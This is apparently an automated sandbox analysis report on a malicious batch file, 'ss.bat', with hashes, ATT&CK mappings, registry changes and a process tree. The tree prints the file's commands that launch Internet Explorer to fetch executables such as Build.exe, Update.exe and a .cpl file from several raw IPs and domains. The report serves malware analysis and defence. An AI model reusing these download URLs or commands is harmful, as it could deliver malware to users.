1e0ee014e2d7558b63fe4408fadf2bf12aa2a3f84c51e2ce8c96503f596a0c41

Analysis

max time kernel
359s
max time network
595s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
27-12-2024 17:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ss.bat
Size

9KB
MD5

36b1271ce5d09beadb5c5b4245a7de19
SHA1

e288980e436228f5518661e284a8503ceca7c66f
SHA256

1e0ee014e2d7558b63fe4408fadf2bf12aa2a3f84c51e2ce8c96503f596a0c41
SHA512

d56df31d2e1c8168fdcc2f86bc46e86d53d3ca45c2efaab2c63aab8d12279039107de6009df9190927ddeff7928507ad3da40592d5bbc36ebe3a38cbacad14f2
SSDEEP

96:Krn8k1pQzTgo+ApZIFOgxUZcp0IvUeh+v1jBtzM3x2LXCT+fjljWWGVRn+uUdKFQ:+20GYWJGWA0

Score

8^/10

discovery

Malware Config

Signatures

Downloads MZ/PE file
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 80b675398558db01	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ebcbee6746f1aa43b9ce6bc99b17765100000000020000000000106600000001000020000000c027474181c1290b12b191c590c4ad11e705fe766785d742e68d1aa8dee1dc54000000000e80000000020000200000001cdabb3861ab1861ad9a9d570d758fa0351f93c3a85e7f86e50ff753933ea83090000000dcd5317a2630a18e4430461115c867b7c0e29232d91045fca289aed179d07cadf048298b9a10b38d9aa3b614c5c0f9ded438d1e1584084e4b952dc17a72d024058b9401f8037e900c3e6fabe763b2853e20f2079e898d699e57082a128044b608929bff12a0a57dbab47b4ef73a6b45fab65fbb6c1f5f9e15304d8de83afb2f95007568213afcda60d5a7df7a04cfeb140000000186ef09b16ecbf8ec899f6363b2306f6d6de5c57ff74751cadd00298e55a6ab2b995bab0bbb72cc87509df8c985251a3411048ad7aab861babb21184e8a97736	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{737863A1-C478-11EF-948A-7A9F8CACAEA3} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{73760241-C478-11EF-948A-7A9F8CACAEA3} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60d96b3b8558db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ebcbee6746f1aa43b9ce6bc99b177651000000000200000000001066000000010000200000007bada85427a8837258a002e1beb90f3282c544fac716ac1a7b50ad246f893187000000000e8000000002000020000000c2aa62818643a9f6dd536cd2cfa352d29d6002af7afffd4b7c6d8efa9093152c200000007506cbcf79cda6cc0483c979d5f8d67f3aad1d23f893551596b66b4a215d5af340000000a9d53b71a2980f0451088463e467d817f5abbec416f9010b7cb341c7b7f55421d85fab092af45f0af0aebeacc4f6671987d23a34decd543b7009c5fa9a219d6e	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
2908	iexplore.exe
2776	iexplore.exe
2812	iexplore.exe
2832	iexplore.exe
2484	iexplore.exe
2008	iexplore.exe
2156	iexplore.exe
580	iexplore.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
2908	iexplore.exe
2908	iexplore.exe
1668	IEXPLORE.EXE
1668	IEXPLORE.EXE
2776	iexplore.exe
2776	iexplore.exe
2296	IEXPLORE.EXE
2296	IEXPLORE.EXE
2812	iexplore.exe
2812	iexplore.exe
2832	iexplore.exe
2832	iexplore.exe
2484	iexplore.exe
2484	iexplore.exe
580	iexplore.exe
580	iexplore.exe
2008	iexplore.exe
2008	iexplore.exe
2156	iexplore.exe
2156	iexplore.exe
2328	IEXPLORE.EXE
2328	IEXPLORE.EXE
2444	IEXPLORE.EXE
2444	IEXPLORE.EXE
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE
1540	IEXPLORE.EXE
1540	IEXPLORE.EXE
1888	IEXPLORE.EXE
1888	IEXPLORE.EXE
1196	IEXPLORE.EXE
1196	IEXPLORE.EXE
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE
976	IEXPLORE.EXE
976	IEXPLORE.EXE
976	IEXPLORE.EXE
976	IEXPLORE.EXE
1972	IEXPLORE.EXE
1972	IEXPLORE.EXE
1972	IEXPLORE.EXE
1972	IEXPLORE.EXE
608	IEXPLORE.EXE
608	IEXPLORE.EXE
608	IEXPLORE.EXE
608	IEXPLORE.EXE
1972	IEXPLORE.EXE
1972	IEXPLORE.EXE
976	IEXPLORE.EXE
976	IEXPLORE.EXE
608	IEXPLORE.EXE
608	IEXPLORE.EXE
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE
1392	IEXPLORE.EXE
1392	IEXPLORE.EXE
1972	IEXPLORE.EXE
1972	IEXPLORE.EXE
2288	IEXPLORE.EXE
2288	IEXPLORE.EXE
2328	IEXPLORE.EXE
2328	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1964 wrote to memory of 2908	1964	cmd.exe	31
PID 1964 wrote to memory of 2908	1964	cmd.exe	31
PID 1964 wrote to memory of 2908	1964	cmd.exe	31
PID 1964 wrote to memory of 2832	1964	cmd.exe	32
PID 1964 wrote to memory of 2832	1964	cmd.exe	32
PID 1964 wrote to memory of 2832	1964	cmd.exe	32
PID 1964 wrote to memory of 2776	1964	cmd.exe	33
PID 1964 wrote to memory of 2776	1964	cmd.exe	33
PID 1964 wrote to memory of 2776	1964	cmd.exe	33
PID 1964 wrote to memory of 2484	1964	cmd.exe	34
PID 1964 wrote to memory of 2484	1964	cmd.exe	34
PID 1964 wrote to memory of 2484	1964	cmd.exe	34
PID 1964 wrote to memory of 2812	1964	cmd.exe	35
PID 1964 wrote to memory of 2812	1964	cmd.exe	35
PID 1964 wrote to memory of 2812	1964	cmd.exe	35
PID 1964 wrote to memory of 2008	1964	cmd.exe	36
PID 1964 wrote to memory of 2008	1964	cmd.exe	36
PID 1964 wrote to memory of 2008	1964	cmd.exe	36
PID 2908 wrote to memory of 1668	2908	iexplore.exe	37
PID 2908 wrote to memory of 1668	2908	iexplore.exe	37
PID 2908 wrote to memory of 1668	2908	iexplore.exe	37
PID 2908 wrote to memory of 1668	2908	iexplore.exe	37
PID 1964 wrote to memory of 2156	1964	cmd.exe	38
PID 1964 wrote to memory of 2156	1964	cmd.exe	38
PID 1964 wrote to memory of 2156	1964	cmd.exe	38
PID 1964 wrote to memory of 580	1964	cmd.exe	39
PID 1964 wrote to memory of 580	1964	cmd.exe	39
PID 1964 wrote to memory of 580	1964	cmd.exe	39
PID 2776 wrote to memory of 2296	2776	iexplore.exe	40
PID 2776 wrote to memory of 2296	2776	iexplore.exe	40
PID 2776 wrote to memory of 2296	2776	iexplore.exe	40
PID 2776 wrote to memory of 2296	2776	iexplore.exe	40
PID 2812 wrote to memory of 2328	2812	iexplore.exe	41
PID 2812 wrote to memory of 2328	2812	iexplore.exe	41
PID 2812 wrote to memory of 2328	2812	iexplore.exe	41
PID 2812 wrote to memory of 2328	2812	iexplore.exe	41
PID 2832 wrote to memory of 2444	2832	iexplore.exe	42
PID 2832 wrote to memory of 2444	2832	iexplore.exe	42
PID 2832 wrote to memory of 2444	2832	iexplore.exe	42
PID 2832 wrote to memory of 2444	2832	iexplore.exe	42
PID 2484 wrote to memory of 2900	2484	iexplore.exe	43
PID 2484 wrote to memory of 2900	2484	iexplore.exe	43
PID 2484 wrote to memory of 2900	2484	iexplore.exe	43
PID 2484 wrote to memory of 2900	2484	iexplore.exe	43
PID 580 wrote to memory of 1196	580	iexplore.exe	44
PID 580 wrote to memory of 1196	580	iexplore.exe	44
PID 580 wrote to memory of 1196	580	iexplore.exe	44
PID 580 wrote to memory of 1196	580	iexplore.exe	44
PID 2008 wrote to memory of 1888	2008	iexplore.exe	45
PID 2008 wrote to memory of 1888	2008	iexplore.exe	45
PID 2008 wrote to memory of 1888	2008	iexplore.exe	45
PID 2008 wrote to memory of 1888	2008	iexplore.exe	45
PID 2156 wrote to memory of 1540	2156	iexplore.exe	46
PID 2156 wrote to memory of 1540	2156	iexplore.exe	46
PID 2156 wrote to memory of 1540	2156	iexplore.exe	46
PID 2156 wrote to memory of 1540	2156	iexplore.exe	46
PID 2484 wrote to memory of 1972	2484	iexplore.exe	48
PID 2484 wrote to memory of 1972	2484	iexplore.exe	48
PID 2484 wrote to memory of 1972	2484	iexplore.exe	48
PID 2484 wrote to memory of 1972	2484	iexplore.exe	48
PID 2484 wrote to memory of 976	2484	iexplore.exe	49
PID 2484 wrote to memory of 976	2484	iexplore.exe	49
PID 2484 wrote to memory of 976	2484	iexplore.exe	49
PID 2484 wrote to memory of 976	2484	iexplore.exe	49

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\ss.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1964
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://185.81.68.147/Build.exe
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2908
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2908 CREDAT:406530 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1668
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://185.81.68.147/zx.exe
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2832
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2832 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2444
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2832 CREDAT:1127427 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2288
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://185.81.68.147/ssg.exe
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2776 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2296
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2776 CREDAT:2831362 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1392
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://185.81.68.147/Update.exe
  2⤵
  - Modifies Internet Explorer Phishing Filter
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2484 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2900
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2484 CREDAT:3159043 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1972
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2484 CREDAT:734211 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:976
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2484 CREDAT:275461 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:608
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://kiltone.top/stelin/Gosjeufon.cpl
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2812 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2328
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2812 CREDAT:3224580 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1516
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2812 CREDAT:3093508 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3044
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://dominikatracy.com/audidg.exe
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2008
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2008 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1888
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://zakazbuketov.kz/audiodf.exe
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2156 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1540
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://80.82.65.70/dl?name=mixthree.exestart
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:580
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:580 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1196
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:580 CREDAT:3879939 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    PID:3032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

